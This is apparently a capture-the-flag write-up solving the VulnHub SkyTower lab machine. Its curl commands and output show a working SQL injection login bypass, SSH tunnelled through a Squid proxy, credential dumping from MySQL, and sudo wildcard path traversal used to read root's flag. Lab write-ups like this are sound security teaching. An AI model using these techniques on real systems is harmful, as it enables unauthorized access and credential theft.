published on in writeup
tags: skytower

SkyTower: 1

SkyTower is a boot2root challenge hosted at VulnHub. The goal is to reach /root/flag.txt.

Nmap

[email protected]:~# nmap -n -sV -A -p- 192.168.127.128

PORT     STATE    SERVICE    VERSION
22/tcp   filtered ssh
80/tcp   open     http       Apache httpd 2.2.22 ((Debian))
|_http-title: Site doesn't have a title (text/html).
3128/tcp open     http-proxy Squid http proxy 3.1.20
|_http-methods: No Allow or Public header in OPTIONS response (status code 400)
|_http-title: ERROR: The requested URL could not be retrieved

SkyTower Login

I punched the IP into Iceweasel and was greeted with a login screen.

The post data of login.php looks like email=&password=. Instead of using the browser, I elected to attempt some injection with cURL. First, a simple test with username and password as x.

[email protected]:~# curl http://192.168.127.128/login.php --data "email=x&password=x"
<br>Login Failed</br>

After inserting an apostrophe into the email field, I received this error:

[email protected]:~# curl http://192.168.127.128/login.php --data "email='&password="
There was an error running the query [You have an error in your SQL syntax; check the manual that corresponds to your MySQL server version for the right syntax to use near '''' and password=''' at line 1]

I tried various authentication bypass injections:

[email protected]:~# curl http://192.168.127.128/login.php --data "email='&password=' or '1'='1"
There was an error running the query [You have an error in your SQL syntax; check the manual that corresponds to your MySQL server version for the right syntax to use near '1''1'' at line 1]

This is a rather curious error message - it appears as though ‘or’ has been filtered out of my request. I spent a bunch of time looking at SQLi filter evasion and possible wildcard inclusion. I finally found the following injection worked:

[email protected]:~# curl http://192.168.127.128/login.php --data "email='*'&password='*'"

For clarity, the result of that injection is screenshot below.

$2 retirement fund… a bit stingy to say the least…

Secure Shell

This message is very useful, in that it flat out tells us to SSH into the box and even provides a username and password. However, if we recall the Nmap scan port 22 was filtered, but there is a Squid proxy running. I used proxytunnel to establish a connection to port 22.

[email protected]:~# proxytunnel -p 192.168.127.128:3128 -d 127.0.0.1:22 -a 2222
[email protected]:~# ssh [email protected] -p 2222
[email protected]'s password: 
Linux SkyTower 3.2.0-4-amd64 #1 SMP Debian 3.2.54-2 x86_64
 
Funds have been withdrawn
Connection to 127.0.0.1 closed.

So I was able to login, but was instantly kicked. There were several ways to get around this. The first is to modify the users’ .bashrc file:

[email protected]:~# ssh john @ 127.0.0.1 -p 2222 "cat /home/john/.bashrc"
 
echo
echo  "Funds have been withdrawn"
exit
[email protected]:~# ssh john @ 127.0.0.1 -p 2222 "sed -i '/exit/s/^/#/' /home/john/.bashrc"

The second is simply to execute another instance of sh or bash.

[email protected]:~# ssh john @ 127.0.0.1 -p 2222 "/bin/bash"

In anycase, I now have a shell. John doesn’t have sudo rights but he does have the permissions to read the login.php file.

[email protected]:~$ cat /var/www/login.php 
$db = new mysqli('localhost', 'root', 'root', 'SkyTech');

It’s also interesting to see the SQLi filtering which was going on:

$sqlinjection = array("SELECT", "TRUE", "FALSE", "--","OR", "=", ",", "AND", "NOT");
$email = str_ireplace($sqlinjection, "", $_POST['email']);
$password = str_ireplace($sqlinjection, "", $_POST['password']);

MySQL

With these credentials, I was able to log in and explore the SQL database and extract the passwords of two other users.

[email protected]:~$ mysql -uroot -proot
 
mysql> show databases;
+--------------------+
| Database           |
+--------------------+
| information_schema |
| SkyTech            |
| mysql              |
| performance_schema |
+--------------------+
 
mysql> use SkyTech
 
mysql> show tables;
+-------------------+
| Tables_in_SkyTech |
+-------------------+
| login             |
+-------------------+
 
mysql> select * from login;
+----+----------------------+--------------+
| id | email                | password     |
+----+----------------------+--------------+
|  1 | john @skytech.com    | hereisjohn   |
|  2 | sara @skytech.com    | ihatethisjob |
|  3 | william @skytech.com | senseable    |
+----+---------------------+---------------+

I SSH’d in as Sara (after fixing the .bashrc file as before) and found that she has some sudo rights.

[email protected]:~$ sudo -l
 
User sara may run the following commands on this host:
    (root) NOPASSWD: /bin/cat /accounts/*, (root) /bin/ls /accounts/*

The wildcard in these allowances are actually vulnerable to a directory traversal type effect.

Root

[email protected]:~$ sudo /bin/ls /accounts/../root/
flag.txt
 
[email protected]:~$ sudo /bin/cat /accounts/../root/flag.txt
Congratz, have a cold one to celebrate!
root password is theskytower

Even though I had root access, I wanted to explore William’s account. The password within the SkyTech database was incorrect for the user, so I cracked the real password by obtaining the shadow file. William’s real password is sensable, not senseable - not sure if this is a typo in the database or intentional. Either way, I didn’t find anything interesting within his user space.